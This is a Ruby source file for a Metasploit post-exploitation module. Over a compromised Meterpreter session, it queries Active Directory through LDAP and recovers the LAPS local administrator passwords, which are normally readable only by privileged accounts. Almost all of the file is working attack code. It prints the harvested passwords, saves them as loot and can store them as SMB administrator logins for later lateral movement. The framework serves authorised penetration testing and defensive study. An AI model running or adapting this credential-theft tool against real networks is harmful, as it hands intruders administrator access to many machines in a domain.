metasploit-gs/modules/post/windows/gather/credentials/enum_laps.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::LDAP

  FIELDS = [
    'distinguishedName',
    'dNSHostName',
    'ms-MCS-AdmPwd',
    'ms-MCS-AdmPwdExpirationTime'
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Credentials Local Administrator Password Solution',
        'Description' => %q{
          This module will recover the LAPS (Local Administrator Password Solution) passwords,
          configured in Active Directory, which is usually only accessible by privileged users.
          Note that the local administrator account name is not stored in Active Directory,
          so it is assumed to be 'Administrator' by default.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ben Campbell',
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_net_resolve_hosts
            ]
          }
        }
      )
    )

    register_options([
      OptString.new('LOCAL_ADMIN_NAME', [true, 'The username to store the password against', 'Administrator']),
      OptBool.new('STORE_DB', [true, 'Store file in loot.', false]),
      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
      OptString.new('FILTER', [true, 'Search filter.', '(&(objectCategory=Computer)(ms-MCS-AdmPwd=*))'])
    ])

    deregister_options('FIELDS')
  end

  def run
    search_filter = datastore['FILTER']
    max_search = datastore['MAX_SEARCH']

    begin
      q = query(search_filter, max_search, FIELDS)
    rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e
      print_error(e.message)
      return
    end

    if q.nil? || q[:results].empty?
      print_status('No results returned.')
    else
      print_status('Parsing results...')
      results_table = parse_results(q[:results])
      print_line results_table.to_s

      if datastore['STORE_LOOT']
        stored_path = store_loot('laps.passwords', 'text/plain', session, results_table.to_csv)
        print_good("Results saved to: #{stored_path}")
      end
    end
  end

  # Takes the results of LDAP query, parses them into a table
  # and records and usernames as {Metasploit::Credential::Core}s in
  # the database if datastore option STORE_DB is true.
  #
  # @param results [Array<Array<Hash>>] The LDAP query results to parse
  # @return [Rex::Text::Table] the table containing all the result data
  def parse_results(results)
    laps_results = []
    # Results table holds raw string data
    results_table = Rex::Text::Table.new(
      'Header' => 'Local Administrator Password Solution (LAPS) Results',
      'Indent' => 1,
      'SortIndex' => -1,
      'Columns' => FIELDS
    )

    results.each do |result|
      row = []

      result.each do |field|
        if field.nil?
          row << ''
        else
          if field[:type] == :number
            value = convert_windows_nt_time_format(field[:value])
          else
            value = field[:value]
          end
          row << value
        end
      end

      hostname = result[FIELDS.index('dNSHostName')][:value].downcase
      password = result[FIELDS.index('ms-MCS-AdmPwd')][:value]
      dn = result[FIELDS.index('distinguishedName')][:value]
      expiration = convert_windows_nt_time_format(result[FIELDS.index('ms-MCS-AdmPwdExpirationTime')][:value])

      next if password.to_s.empty?

      results_table << row
      laps_results << {
        hostname: hostname,
        password: password,
        dn: dn,
        expiration: expiration
      }
    end

    if datastore['STORE_DB']
      print_status('Resolving IP addresses...')
      hosts = []
      laps_results.each do |h|
        hosts << h[:hostname]
      end

      resolve_results = client.net.resolve.resolve_hosts(hosts)

      # Match each IP to a host...
      resolve_results.each do |r|
        l = laps_results.find { |laps| laps[:hostname] == r[:hostname] }
        l[:ip] = r[:ip]
      end

      laps_results.each do |r|
        next if r[:ip].to_s.empty?
        next if r[:password].to_s.empty?

        store_creds(datastore['LOCAL_ADMIN_NAME'], r[:password], r[:ip])
      end
    end

    results_table
  end

  def store_creds(username, password, ip)
    service_data = {
      address: ip,
      port: 445,
      service_name: 'smb',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      username: username,
      private_data: password,
      private_type: :password
    }

    credential_data.merge!(service_data)

    # Create the Metasploit::Credential::Core object
    credential_core = create_credential(credential_data)

    # Assemble the options hash for creating the Metasploit::Credential::Login object
    login_data = {
      core: credential_core,
      access_level: 'Administrator',
      status: Metasploit::Model::Login::Status::UNTRIED
    }

    # Merge in the service data and create our Login
    login_data.merge!(service_data)
    create_credential_login(login_data)
  end

  # https://gist.github.com/nowhereman/189111
  def convert_windows_nt_time_format(windows_time)
    unix_time = windows_time.to_i / 10000000 - 11644473600
    ruby_time = Time.at(unix_time)
    ruby_time.strftime('%d/%m/%Y %H:%M:%S GMT %z')
  end
end